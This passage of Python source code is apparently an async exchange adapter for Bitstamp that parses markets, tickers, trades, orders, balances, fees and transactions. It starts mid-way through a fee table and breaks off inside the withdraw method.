[self.parse_number('20000000'), self.parse_number('0.0011')],
[self.parse_number('50000000'), self.parse_number('0.0010')],
[self.parse_number('100000000'), self.parse_number('0.0007')],
[self.parse_number('500000000'), self.parse_number('0.0005')],
[self.parse_number('2000000000'), self.parse_number('0.0003')],
[self.parse_number('6000000000'), self.parse_number('0.0001')],
[self.parse_number('20000000000'), self.parse_number('0.00005')],
[self.parse_number('20000000001'), self.parse_number('0')],
],
},
},
'funding': {
'tierBased': False,
'percentage': False,
'withdraw': {},
'deposit': {
'BTC': 0,
'BCH': 0,
'LTC': 0,
'ETH': 0,
'XRP': 0,
'XLM': 0,
'PAX': 0,
'USD': 7.5,
'EUR': 0,
},
},
},
'exceptions': {
'exact': {
'No permission found': PermissionDenied,
'API key not found': AuthenticationError,
'IP address not allowed': PermissionDenied,
'Invalid nonce': InvalidNonce,
'Invalid signature': AuthenticationError,
'Authentication failed': AuthenticationError,
'Missing key, signature and nonce parameters': AuthenticationError,
'Wrong API key format': AuthenticationError,
'Your account is frozen': PermissionDenied,
'Please update your profile with your FATCA information, before using API.': PermissionDenied,
'Order not found': OrderNotFound,
'Price is more than 20% below market price.': InvalidOrder,
"Bitstamp.net is under scheduled maintenance. We'll be back soon.": OnMaintenance, # {"error": "Bitstamp.net is under scheduled maintenance. We'll be back soon."}
'Order could not be placed.': ExchangeNotAvailable, # Order could not be placed(perhaps due to internal error or trade halt). Please retry placing order.
'Invalid offset.': BadRequest,
},
'broad': {
'Minimum order size is': InvalidOrder, # Minimum order size is 5.0 EUR.
'Check your account balance for details.': InsufficientFunds, # You have only 0.00100000 BTC available. Check your account balance for details.
'Ensure self value has at least': InvalidAddress, # Ensure self value has at least 25 characters(it has 4).
},
},
})
async def fetch_markets(self, params={}):
response = await self.fetch_markets_from_cache(params)
#
# [
# {
# "trading": "Enabled",
# "base_decimals": 8,
# "url_symbol": "btcusd",
# "name": "BTC/USD",
# "instant_and_market_orders": "Enabled",
# "minimum_order": "20.0 USD",
# "counter_decimals": 2,
# "description": "Bitcoin / U.S. dollar"
# }
# ]
#
result = []
for i in range(0, len(response)):
market = response[i]
name = self.safe_string(market, 'name')
base, quote = name.split('/')
baseId = base.lower()
quoteId = quote.lower()
base = self.safe_currency_code(base)
quote = self.safe_currency_code(quote)
minimumOrder = self.safe_string(market, 'minimum_order')
parts = minimumOrder.split(' ')
status = self.safe_string(market, 'trading')
result.append({
'id': self.safe_string(market, 'url_symbol'),
'marketId': baseId + '_' + quoteId,
'symbol': base + '/' + quote,
'base': base,
'quote': quote,
'settle': None,
'baseId': baseId,
'quoteId': quoteId,
'settleId': None,
'type': 'spot',
'spot': True,
'margin': False,
'future': False,
'swap': False,
'option': False,
'active': (status == 'Enabled'),
'contract': False,
'linear': None,
'inverse': None,
'contractSize': None,
'expiry': None,
'expiryDatetime': None,
'strike': None,
'optionType': None,
'precision': {
'amount': self.safe_integer(market, 'base_decimals'),
'price': self.safe_integer(market, 'counter_decimals'),
},
'limits': {
'leverage': {
'min': None,
'max': None,
},
'amount': {
'min': None,
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': self.safe_number(parts, 0),
'max': None,
},
},
'info': market,
})
return result
def construct_currency_object(self, id, code, name, precision, minCost, originalPayload):
currencyType = 'crypto'
description = self.describe()
if self.is_fiat(code):
currencyType = 'fiat'
return {
'id': id,
'code': code,
'info': originalPayload, # the original payload
'type': currencyType,
'name': name,
'active': True,
'deposit': None,
'withdraw': None,
'fee': self.safe_number(description['fees']['funding']['withdraw'], code),
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision),
'max': None,
},
'price': {
'min': math.pow(10, -precision),
'max': None,
},
'cost': {
'min': minCost,
'max': None,
},
'withdraw': {
'min': None,
'max': None,
},
},
}
async def fetch_markets_from_cache(self, params={}):
# self method is now redundant
# currencies are now fetched before markets
options = self.safe_value(self.options, 'fetchMarkets', {})
timestamp = self.safe_integer(options, 'timestamp')
expires = self.safe_integer(options, 'expires', 1000)
now = self.milliseconds()
if (timestamp is None) or ((now - timestamp) > expires):
response = await self.publicGetTradingPairsInfo(params)
self.options['fetchMarkets'] = self.extend(options, {
'response': response,
'timestamp': now,
})
return self.safe_value(self.options['fetchMarkets'], 'response')
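# Illustrative note: with the default 'expires' of 1000 ms, two calls within one
# second reuse the cached trading-pairs-info response; a longer lifetime can be
# configured before the first request via
# self.options['fetchMarkets'] = {'expires': 60000} (hypothetical value).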
async def fetch_currencies(self, params={}):
response = await self.fetch_markets_from_cache(params)
#
# [
# {
# "trading": "Enabled",
# "base_decimals": 8,
# "url_symbol": "btcusd",
# "name": "BTC/USD",
# "instant_and_market_orders": "Enabled",
# "minimum_order": "20.0 USD",
# "counter_decimals": 2,
# "description": "Bitcoin / U.S. dollar"
# },
# ]
#
result = {}
for i in range(0, len(response)):
market = response[i]
name = self.safe_string(market, 'name')
base, quote = name.split('/')
baseId = base.lower()
quoteId = quote.lower()
base = self.safe_currency_code(base)
quote = self.safe_currency_code(quote)
description = self.safe_string(market, 'description')
baseDescription, quoteDescription = description.split(' / ')
minimumOrder = self.safe_string(market, 'minimum_order')
parts = minimumOrder.split(' ')
cost = parts[0]
if not (base in result):
baseDecimals = self.safe_integer(market, 'base_decimals')
result[base] = self.construct_currency_object(baseId, base, baseDescription, baseDecimals, None, market)
if not (quote in result):
counterDecimals = self.safe_integer(market, 'counter_decimals')
result[quote] = self.construct_currency_object(quoteId, quote, quoteDescription, counterDecimals, self.parse_number(cost), market)
return result
async def fetch_order_book(self, symbol, limit=None, params={}):
await self.load_markets()
request = {
'pair': self.market_id(symbol),
}
response = await self.publicGetOrderBookPair(self.extend(request, params))
#
# {
# "timestamp": "1583652948",
# "microtimestamp": "1583652948955826",
# "bids": [
# ["8750.00", "1.33685271"],
# ["8749.39", "0.07700000"],
# ["8746.98", "0.07400000"],
# ]
# "asks": [
# ["8754.10", "1.51995636"],
# ["8754.71", "1.40000000"],
# ["8754.72", "2.50000000"],
# ]
# }
#
microtimestamp = self.safe_integer(response, 'microtimestamp')
timestamp = int(microtimestamp / 1000)
orderbook = self.parse_order_book(response, symbol, timestamp)
orderbook['nonce'] = microtimestamp
return orderbook
def parse_ticker(self, ticker, market=None):
#
# {
# "high": "37534.15",
# "last": "36487.44",
# "timestamp":
# "1643370585",
# "bid": "36475.15",
# "vwap": "36595.67",
# "volume": "2848.49168527",
# "low": "35511.32",
# "ask": "36487.44",
# "open": "37179.62"
# }
#
symbol = self.safe_symbol(None, market)
timestamp = self.safe_timestamp(ticker, 'timestamp')
vwap = self.safe_string(ticker, 'vwap')
baseVolume = self.safe_string(ticker, 'volume')
quoteVolume = Precise.string_mul(baseVolume, vwap)
last = self.safe_string(ticker, 'last')
return self.safe_ticker({
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_string(ticker, 'high'),
'low': self.safe_string(ticker, 'low'),
'bid': self.safe_string(ticker, 'bid'),
'bidVolume': None,
'ask': self.safe_string(ticker, 'ask'),
'askVolume': None,
'vwap': vwap,
'open': self.safe_string(ticker, 'open'),
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}, market, False)
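# Illustrative note: quoteVolume is derived as baseVolume * vwap, e.g. for the
# sample ticker above roughly 2848.49168527 * 36595.67, i.e. about 1.04e8 USD.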
async def fetch_ticker(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
}
ticker = await self.publicGetTickerPair(self.extend(request, params))
#
# {
# "high": "37534.15",
# "last": "36487.44",
# "timestamp":
# "1643370585",
# "bid": "36475.15",
# "vwap": "36595.67",
# "volume": "2848.49168527",
# "low": "35511.32",
# "ask": "36487.44",
# "open": "37179.62"
# }
#
return self.parse_ticker(ticker, market)
def get_currency_id_from_transaction(self, transaction):
#
# {
# "fee": "0.00000000",
# "btc_usd": "0.00",
# "datetime": XXX,
# "usd": 0.0,
# "btc": 0.0,
# "eth": "0.05000000",
# "type": "0",
# "id": XXX,
# "eur": 0.0
# }
#
currencyId = self.safe_string_lower(transaction, 'currency')
if currencyId is not None:
return currencyId
transaction = self.omit(transaction, [
'fee',
'price',
'datetime',
'type',
'status',
'id',
])
ids = list(transaction.keys())
for i in range(0, len(ids)):
id = ids[i]
if id.find('_') < 0:
value = self.safe_number(transaction, id)
if (value is not None) and (value != 0):
return id
return None
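# Worked example: for the sample transaction above, omitting 'fee', 'datetime',
# 'type' and 'id' leaves 'btc_usd', 'usd', 'btc', 'eth' and 'eur'; 'btc_usd' is
# skipped because it contains an underscore, 'usd', 'btc' and 'eur' are zero,
# and 'eth' ("0.05000000") is non-zero, so 'eth' is returned as the currency id.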
def get_market_from_trade(self, trade):
trade = self.omit(trade, [
'fee',
'price',
'datetime',
'tid',
'type',
'order_id',
'side',
])
currencyIds = list(trade.keys())
numCurrencyIds = len(currencyIds)
if numCurrencyIds > 2:
raise ExchangeError(self.id + ' getMarketFromTrade too many keys: ' + self.json(currencyIds) + ' in the trade: ' + self.json(trade))
if numCurrencyIds == 2:
marketId = currencyIds[0] + currencyIds[1]
if marketId in self.markets_by_id:
return self.markets_by_id[marketId]
marketId = currencyIds[1] + currencyIds[0]
if marketId in self.markets_by_id:
return self.markets_by_id[marketId]
return None
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {
# "date": "1637845199",
# "tid": "209895701",
# "amount": "0.00500000",
# "type": "0", # Transaction type: 0 - buy; 1 - sell
# "price": "4451.25"
# }
#
# fetchMyTrades, trades returned within fetchOrder(private)
#
# {
# "fee": "0.11128",
# "eth_usdt": 4451.25,
# "datetime": "2021-11-25 12:59:59.322000",
# "usdt": "-22.26",
# "order_id": 1429545880227846,
# "usd": 0,
# "btc": 0,
# "eth": "0.00500000",
# "type": "2", # Transaction type: 0 - deposit; 1 - withdrawal; 2 - market trade; 14 - sub account transfer; 25 - credited with staked assets; 26 - sent assets to staking; 27 - staking reward; 32 - referral reward; 35 - inter account transfer.
# "id": 209895701,
# "eur": 0
# }
#
# from fetchOrder(private)
#
# {
# "fee": "0.11128",
# "price": "4451.25000000",
# "datetime": "2021-11-25 12:59:59.322000",
# "usdt": "22.25625000",
# "tid": 209895701,
# "eth": "0.00500000",
# "type": 2 # Transaction type: 0 - deposit; 1 - withdrawal; 2 - market trade
# }
#
id = self.safe_string_2(trade, 'id', 'tid')
symbol = None
side = None
priceString = self.safe_string(trade, 'price')
amountString = self.safe_string(trade, 'amount')
orderId = self.safe_string(trade, 'order_id')
type = None
costString = self.safe_string(trade, 'cost')
if market is None:
keys = list(trade.keys())
for i in range(0, len(keys)):
if keys[i].find('_') >= 0:
marketId = keys[i].replace('_', '')
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
# if the market is still not defined
# try to deduce it from used keys
if market is None:
market = self.get_market_from_trade(trade)
feeCostString = self.safe_string(trade, 'fee')
feeCurrency = None
if market is not None:
priceString = self.safe_string(trade, market['marketId'], priceString)
amountString = self.safe_string(trade, market['baseId'], amountString)
costString = self.safe_string(trade, market['quoteId'], costString)
feeCurrency = market['quote']
symbol = market['symbol']
timestamp = self.safe_string_2(trade, 'date', 'datetime')
if timestamp is not None:
if timestamp.find(' ') >= 0:
# iso8601
timestamp = self.parse8601(timestamp)
else:
# string unix epoch in seconds
timestamp = int(timestamp)
timestamp = timestamp * 1000
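# Illustrative examples: "2021-11-25 12:59:59.322000" contains a space and is
# handed to parse8601, whereas "1637845199" is treated as unix seconds and
# multiplied by 1000, giving the millisecond timestamp 1637845199000.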
# if it is a private trade
if 'id' in trade:
if amountString is not None:
isAmountNeg = Precise.string_lt(amountString, '0')
if isAmountNeg:
side = 'sell'
amountString = Precise.string_neg(amountString)
else:
side = 'buy'
else:
side = self.safe_string(trade, 'type')
if side == '1':
side = 'sell'
elif side == '0':
side = 'buy'
else:
side = None
if costString is not None:
costString = Precise.string_abs(costString)
fee = None
if feeCostString is not None:
fee = {
'cost': feeCostString,
'currency': feeCurrency,
}
return self.safe_trade({
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': orderId,
'type': type,
'side': side,
'takerOrMaker': None,
'price': priceString,
'amount': amountString,
'cost': costString,
'fee': fee,
}, market)
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
'time': 'hour',
}
response = await self.publicGetTransactionsPair(self.extend(request, params))
#
# [
# {
# date: '1551814435',
# tid: '83581898',
# price: '0.03532850',
# type: '1',
# amount: '0.85945907'
# },
# {
# date: '1551814434',
# tid: '83581896',
# price: '0.03532851',
# type: '1',
# amount: '11.34130961'
# },
# ]
#
return self.parse_trades(response, market, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# "high": "9064.77",
# "timestamp": "1593961440",
# "volume": "18.49436608",
# "low": "9040.87",
# "close": "9064.77",
# "open": "9040.87"
# }
#
return [
self.safe_timestamp(ohlcv, 'timestamp'),
self.safe_number(ohlcv, 'open'),
self.safe_number(ohlcv, 'high'),
self.safe_number(ohlcv, 'low'),
self.safe_number(ohlcv, 'close'),
self.safe_number(ohlcv, 'volume'),
]
async def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
'step': self.timeframes[timeframe],
}
duration = self.parse_timeframe(timeframe)
if limit is None:
if since is None:
raise ArgumentsRequired(self.id + ' fetchOHLCV() requires a since argument or a limit argument')
else:
limit = 1000
start = int(since / 1000)
request['start'] = start
request['end'] = self.sum(start, limit * duration)
request['limit'] = limit
else:
if since is not None:
start = int(since / 1000)
request['start'] = start
request['end'] = self.sum(start, limit * duration)
request['limit'] = min(limit, 1000) # min 1, max 1000
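# Illustrative example (hypothetical arguments): with timeframe='1m'
# (duration = 60 s), since=1593961440000 and limit=3, start = 1593961440 and
# end = 1593961440 + 3 * 60 = 1593961620, which covers the three sample candles
# shown in the response below.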
response = await self.publicGetOhlcPair(self.extend(request, params))
#
# {
# "data": {
# "pair": "BTC/USD",
# "ohlc": [
# {"high": "9064.77", "timestamp": "1593961440", "volume": "18.49436608", "low": "9040.87", "close": "9064.77", "open": "9040.87"},
# {"high": "9071.59", "timestamp": "1593961500", "volume": "3.48631711", "low": "9058.76", "close": "9061.07", "open": "9064.66"},
# {"high": "9067.33", "timestamp": "1593961560", "volume": "0.04142833", "low": "9061.94", "close": "9061.94", "open": "9067.33"},
# ],
# }
# }
#
data = self.safe_value(response, 'data', {})
ohlc = self.safe_value(data, 'ohlc', [])
return self.parse_ohlcvs(ohlc, market, timeframe, since, limit)
def parse_balance(self, response):
result = {
'info': response,
'timestamp': None,
'datetime': None,
}
codes = list(self.currencies.keys())
for i in range(0, len(codes)):
code = codes[i]
currency = self.currency(code)
currencyId = currency['id']
account = self.account()
account['free'] = self.safe_string(response, currencyId + '_available')
account['used'] = self.safe_string(response, currencyId + '_reserved')
account['total'] = self.safe_string(response, currencyId + '_balance')
result[code] = account
return self.safe_balance(result)
async def fetch_balance(self, params={}):
await self.load_markets()
response = await self.privatePostBalance(params)
#
# {
# "aave_available": "0.00000000",
# "aave_balance": "0.00000000",
# "aave_reserved": "0.00000000",
# "aave_withdrawal_fee": "0.07000000",
# "aavebtc_fee": "0.000",
# "aaveeur_fee": "0.000",
# "aaveusd_fee": "0.000",
# "bat_available": "0.00000000",
# "bat_balance": "0.00000000",
# "bat_reserved": "0.00000000",
# "bat_withdrawal_fee": "5.00000000",
# "batbtc_fee": "0.000",
# "bateur_fee": "0.000",
# "batusd_fee": "0.000",
# }
#
return self.parse_balance(response)
async def fetch_trading_fee(self, symbol, params={}):
await self.load_markets()
market = self.market(symbol)
request = {
'pair': market['id'],
}
response = await self.privatePostBalancePair(self.extend(request, params))
return self.parse_trading_fee(response, market)
def parse_trading_fee(self, fee, market=None):
market = self.safe_market(None, market)
feeString = self.safe_string(fee, market['id'] + '_fee')
dividedFeeString = Precise.string_div(feeString, '100')
tradeFee = self.parse_number(dividedFeeString)
return {
'info': fee,
'symbol': market['symbol'],
'maker': tradeFee,
'taker': tradeFee,
}
def parse_trading_fees(self, fees):
result = {'info': fees}
symbols = self.symbols
for i in range(0, len(symbols)):
symbol = symbols[i]
market = self.market(symbol)
fee = self.parse_trading_fee(fees, market)
result[symbol] = fee
return result
async def fetch_trading_fees(self, params={}):
await self.load_markets()
response = await self.privatePostBalance(params)
return self.parse_trading_fees(response)
def parse_funding_fees(self, balance):
withdraw = {}
ids = list(balance.keys())
for i in range(0, len(ids)):
id = ids[i]
if id.find('_withdrawal_fee') >= 0:
currencyId = id.split('_')[0]
code = self.safe_currency_code(currencyId)
withdraw[code] = self.safe_number(balance, id)
return {
'info': balance,
'withdraw': withdraw,
'deposit': {},
}
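# Illustrative example: a balance key such as "aave_withdrawal_fee": "0.07000000"
# (see the sample privatePostBalance response above) becomes
# withdraw['AAVE'] = 0.07 in the structure returned here.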
async def fetch_funding_fees(self, params={}):
await self.load_markets()
balance = await self.privatePostBalance(params)
return self.parse_funding_fees(balance)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
await self.load_markets()
market = self.market(symbol)
method = 'privatePost' + self.capitalize(side)
request = {
'pair': market['id'],
'amount': self.amount_to_precision(symbol, amount),
}
if type == 'market':
method += 'Market'
elif type == 'instant':
method += 'Instant'
else:
request['price'] = self.price_to_precision(symbol, price)
method += 'Pair'
clientOrderId = self.safe_string_2(params, 'client_order_id', 'clientOrderId')
if clientOrderId is not None:
request['client_order_id'] = clientOrderId
params = self.omit(params, ['client_order_id', 'clientOrderId'])
response = await getattr(self, method)(self.extend(request, params))
order = self.parse_order(response, market)
return self.extend(order, {
'type': type,
})
async def cancel_order(self, id, symbol=None, params={}):
await self.load_markets()
request = {
'id': id,
}
return await self.privatePostCancelOrder(self.extend(request, params))
async def cancel_all_orders(self, symbol=None, params={}):
await self.load_markets()
market = None
request = {}
method = 'privatePostCancelAllOrders'
if symbol is not None:
market = self.market(symbol)
request['pair'] = market['id']
method = 'privatePostCancelAllOrdersPair'
return await getattr(self, method)(self.extend(request, params))
def parse_order_status(self, status):
statuses = {
'In Queue': 'open',
'Open': 'open',
'Finished': 'closed',
'Canceled': 'canceled',
}
return self.safe_string(statuses, status, status)
async def fetch_order_status(self, id, symbol=None, params={}):
await self.load_markets()
clientOrderId = self.safe_value_2(params, 'client_order_id', 'clientOrderId')
request = {}
if clientOrderId is not None:
request['client_order_id'] = clientOrderId
params = self.omit(params, ['client_order_id', 'clientOrderId'])
else:
request['id'] = id
response = await self.privatePostOrderStatus(self.extend(request, params))
return self.parse_order_status(self.safe_string(response, 'status'))
async def fetch_order(self, id, symbol=None, params={}):
await self.load_markets()
market = None
if symbol is not None:
market = self.market(symbol)
clientOrderId = self.safe_value_2(params, 'client_order_id', 'clientOrderId')
request = {}
if clientOrderId is not None:
request['client_order_id'] = clientOrderId
params = self.omit(params, ['client_order_id', 'clientOrderId'])
else:
request['id'] = id
response = await self.privatePostOrderStatus(self.extend(request, params))
#
# {
# "status": "Finished",
# "id": 1429545880227846,
# "amount_remaining": "0.00000000",
# "transactions": [
# {
# "fee": "0.11128",
# "price": "4451.25000000",
# "datetime": "2021-11-25 12:59:59.322000",
# "usdt": "22.25625000",
# "tid": 209895701,
# "eth": "0.00500000",
# "type": 2
# }
# ]
# }
#
return self.parse_order(response, market)
async def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
method = 'privatePostUserTransactions'
market = None
if symbol is not None:
market = self.market(symbol)
request['pair'] = market['id']
method += 'Pair'
if limit is not None:
request['limit'] = limit
response = await getattr(self, method)(self.extend(request, params))
result = self.filter_by(response, 'type', '2')
return self.parse_trades(result, market, since, limit)
async def fetch_transactions(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
if limit is not None:
request['limit'] = limit
response = await self.privatePostUserTransactions(self.extend(request, params))
#
# [
# {
# "fee": "0.00000000",
# "btc_usd": "0.00",
# "id": 1234567894,
# "usd": 0,
# "btc": 0,
# "datetime": "2018-09-08 09:00:31",
# "type": "1",
# "xrp": "-20.00000000",
# "eur": 0,
# },
# {
# "fee": "0.00000000",
# "btc_usd": "0.00",
# "id": 1134567891,
# "usd": 0,
# "btc": 0,
# "datetime": "2018-09-07 18:47:52",
# "type": "0",
# "xrp": "20.00000000",
# "eur": 0,
# },
# ]
#
currency = None
if code is not None:
currency = self.currency(code)
transactions = self.filter_by_array(response, 'type', ['0', '1'], False)
return self.parse_transactions(transactions, currency, since, limit)
async def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
if since is not None:
request['timedelta'] = self.milliseconds() - since
else:
request['timedelta'] = 50000000 # use max bitstamp approved value
response = await self.privatePostWithdrawalRequests(self.extend(request, params))
#
# [
# {
# status: 2,
# datetime: '2018-10-17 10:58:13',
# currency: 'BTC',
# amount: '0.29669259',
# address: 'aaaaa',
# type: 1,
# id: 111111,
# transaction_id: 'xxxx',
# },
# {
# status: 2,
# datetime: '2018-10-17 10:55:17',
# currency: 'ETH',
# amount: '1.11010664',
# address: 'aaaa',
# type: 16,
# id: 222222,
# transaction_id: 'xxxxx',
# },
# ]
#
return self.parse_transactions(response, None, since, limit)
def parse_transaction(self, transaction, currency=None):
#
# fetchTransactions
#
# {
# "fee": "0.00000000",
# "btc_usd": "0.00",
# "id": 1234567894,
# "usd": 0,
# "btc": 0,
# "datetime": "2018-09-08 09:00:31",
# "type": "1",
# "xrp": "-20.00000000",
# "eur": 0,
# }
#
# fetchWithdrawals
#
# {
# status: 2,
# datetime: '2018-10-17 10:58:13',
# currency: 'BTC',
# amount: '0.29669259',
# address: 'aaaaa',
# type: 1,
# id: 111111,
# transaction_id: 'xxxx',
# }
#
# {
# "id": 3386432,
# "type": 14,
# "amount": "863.21332500",
# "status": 2,
# "address": "rE1sdh25BJQ3qFwngiTBwaq3zPGGYcrjp1?dt=1455",
# "currency": "XRP",
# "datetime": "2018-01-05 15:27:55",
# "transaction_id": "001743B03B0C79BA166A064AC0142917B050347B4CB23BA2AB4B91B3C5608F4C"
# }
#
timestamp = self.parse8601(self.safe_string(transaction, 'datetime'))
id = self.safe_string(transaction, 'id')
currencyId = self.get_currency_id_from_transaction(transaction)
code = self.safe_currency_code(currencyId, currency)
feeCost = self.safe_number(transaction, 'fee')
feeCurrency = None
amount = None
if 'amount' in transaction:
amount = self.safe_number(transaction, 'amount')
elif currency is not None:
amount = self.safe_number(transaction, currency['id'], amount)
feeCurrency = currency['code']
elif (code is not None) and (currencyId is not None):
amount = self.safe_number(transaction, currencyId, amount)
feeCurrency = code
if amount is not None:
# withdrawals have a negative amount
amount = abs(amount)
status = 'ok'
if 'status' in transaction:
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
type = None
if 'type' in transaction:
# from fetchTransactions
rawType = self.safe_string(transaction, 'type')
if rawType == '0':
type = 'deposit'
elif rawType == '1':
type = 'withdrawal'
else:
# from fetchWithdrawals
type = 'withdrawal'
txid = self.safe_string(transaction, 'transaction_id')
tag = None
address = self.safe_string(transaction, 'address')
if address is not None:
# dt(destination tag) is embedded into the address field
addressParts = address.split('?dt=')
numParts = len(addressParts)
if numParts > 1:
address = addressParts[0]
tag = addressParts[1]
addressFrom = None
addressTo = address
tagFrom = None
tagTo = tag
fee = None
if feeCost is not None:
fee = {
'currency': feeCurrency,
'cost': feeCost,
'rate': None,
}
return {
'info': transaction,
'id': id,
'txid': txid,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'network': None,
'addressFrom': addressFrom,
'addressTo': addressTo,
'address': address,
'tagFrom': tagFrom,
'tagTo': tagTo,
'tag': tag,
'type': type,
'amount': amount,
'currency': code,
'status': status,
'updated': None,
'fee': fee,
}
def parse_transaction_status(self, status):
# withdrawals:
# 0(open), 1(in process), 2(finished), 3(canceled) or 4(failed).
statuses = {
'0': 'pending', # Open
'1': 'pending', # In process
'2': 'ok', # Finished
'3': 'canceled', # Canceled
'4': 'failed', # Failed
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
# from fetch order:
# {status: 'Finished',
# id: 731693945,
# client_order_id: '',
# transactions:
# [{fee: '0.000019',
# price: '0.00015803',
# datetime: '2018-01-07 10:45:34.132551',
# btc: '0.0079015000000000',
# tid: 42777395,
# type: 2,
# xrp: '50.00000000'}]}
#
# partially filled order:
# {"id": 468646390,
# "client_order_id": "",
# "status": "Canceled",
# "transactions": [{
# "eth": "0.23000000",
# "fee": "0.09",
# "tid": 25810126,
# "usd": "69.8947000000000000",
# "type": 2,
# "price": "303.89000000",
# "datetime": "2017-11-11 07:22:20.710567"
# }]}
#
# from create order response:
# {
# price: '0.00008012',
# client_order_id: '',
# currency_pair: 'XRP/BTC',
# datetime: '2019-01-31 21:23:36',
# amount: '15.00000000',
# type: '0',
# id: '2814205012'
# }
#
id = self.safe_string(order, 'id')
clientOrderId = self.safe_string(order, 'client_order_id')
side = self.safe_string(order, 'type')
if side is not None:
side = 'sell' if (side == '1') else 'buy'
# there is no timestamp from fetchOrder
timestamp = self.parse8601(self.safe_string(order, 'datetime'))
marketId = self.safe_string_lower(order, 'currency_pair')
symbol = self.safe_symbol(marketId, market, '/')
status = self.parse_order_status(self.safe_string(order, 'status'))
amount = self.safe_string(order, 'amount')
transactions = self.safe_value(order, 'transactions', [])
price = self.safe_string(order, 'price')
return self.safe_order({
'id': id,
'clientOrderId': clientOrderId,
'datetime': self.iso8601(timestamp),
'timestamp': timestamp,
'lastTradeTimestamp': None,
'status': status,
'symbol': symbol,
'type': None,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': price,
'stopPrice': None,
'cost': None,
'amount': amount,
'filled': None,
'remaining': None,
'trades': transactions,
'fee': None,
'info': order,
'average': None,
}, market)
def parse_ledger_entry_type(self, type):
types = {
'0': 'transaction',
'1': 'transaction',
'2': 'trade',
'14': 'transfer',
}
return self.safe_string(types, type, type)
def parse_ledger_entry(self, item, currency=None):
#
# [
# {
# "fee": "0.00000000",
# "btc_usd": "0.00",
# "id": 1234567894,
# "usd": 0,
# "btc": 0,
# "datetime": "2018-09-08 09:00:31",
# "type": "1",
# "xrp": "-20.00000000",
# "eur": 0,
# },
# {
# "fee": "0.00000000",
# "btc_usd": "0.00",
# "id": 1134567891,
# "usd": 0,
# "btc": 0,
# "datetime": "2018-09-07 18:47:52",
# "type": "0",
# "xrp": "20.00000000",
# "eur": 0,
# },
# ]
#
type = self.parse_ledger_entry_type(self.safe_string(item, 'type'))
if type == 'trade':
parsedTrade = self.parse_trade(item)
market = None
keys = list(item.keys())
for i in range(0, len(keys)):
if keys[i].find('_') >= 0:
marketId = keys[i].replace('_', '')
if marketId in self.markets_by_id:
market = self.markets_by_id[marketId]
# if the market is still not defined
# try to deduce it from used keys
if market is None:
market = self.get_market_from_trade(item)
direction = 'in' if (parsedTrade['side'] == 'buy') else 'out'
return {
'id': parsedTrade['id'],
'info': item,
'timestamp': parsedTrade['timestamp'],
'datetime': parsedTrade['datetime'],
'direction': direction,
'account': None,
'referenceId': parsedTrade['order'],
'referenceAccount': None,
'type': type,
'currency': market['base'],
'amount': parsedTrade['amount'],
'before': None,
'after': None,
'status': 'ok',
'fee': parsedTrade['fee'],
}
else:
parsedTransaction = self.parse_transaction(item, currency)
direction = None
if 'amount' in item:
amount = self.safe_number(item, 'amount')
direction = 'in' if (amount > 0) else 'out'
elif ('currency' in parsedTransaction) and parsedTransaction['currency'] is not None:
currencyCode = self.safe_string(parsedTransaction, 'currency')
currency = self.currency(currencyCode)
amount = self.safe_number(item, currency['id'])
direction = 'in' if (amount > 0) else 'out'
return {
'id': parsedTransaction['id'],
'info': item,
'timestamp': parsedTransaction['timestamp'],
'datetime': parsedTransaction['datetime'],
'direction': direction,
'account': None,
'referenceId': parsedTransaction['txid'],
'referenceAccount': None,
'type': type,
'currency': parsedTransaction['currency'],
'amount': parsedTransaction['amount'],
'before': None,
'after': None,
'status': parsedTransaction['status'],
'fee': parsedTransaction['fee'],
}
async def fetch_ledger(self, code=None, since=None, limit=None, params={}):
await self.load_markets()
request = {}
if limit is not None:
request['limit'] = limit
response = await self.privatePostUserTransactions(self.extend(request, params))
currency = None
if code is not None:
currency = self.currency(code)
return self.parse_ledger(response, currency, since, limit)
async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
market = None
await self.load_markets()
if symbol is not None:
market = self.market(symbol)
response = await self.privatePostOpenOrdersAll(params)
# [
# {
# price: '0.00008012',
# currency_pair: 'XRP/BTC',
# client_order_id: '',
# datetime: '2019-01-31 21:23:36',
# amount: '15.00000000',
# type: '0',
# id: '2814205012',
# }
# ]
#
return self.parse_orders(response, market, since, limit, {
'status': 'open',
'type': 'limit',
})
def get_currency_name(self, code):
return code.lower()
def is_fiat(self, code):
return code == 'USD' or code == 'EUR' or code == 'GBP'
async def fetch_deposit_address(self, code, params={}):
if self.is_fiat(code):
raise NotSupported(self.id + ' fiat fetchDepositAddress() for ' + code + ' is not supported!')
name = self.get_currency_name(code)
method = 'privatePost' + self.capitalize(name) + 'Address'
response = await getattr(self, method)(params)
address = self.safe_string(response, 'address')
tag = self.safe_string_2(response, 'memo_id', 'destination_tag')
self.check_address(address)
return {
'currency': code,
'address': address,
'tag': tag,
'network': None,
'info': response,
}
async def withdraw(self, code, amount, address, tag=None, params={}):
# For fiat withdrawals please provide all required additional parameters in the 'params'
# Check https://www.bitstamp.net/api/ under 'Open bank withdrawal' for list and description.
tag, params = self.handle_withdraw_tag_and_params(tag, params)
await self.load_markets()
self.check_address(address)
request = {
'amount': amount,
}
currency = None
method = None
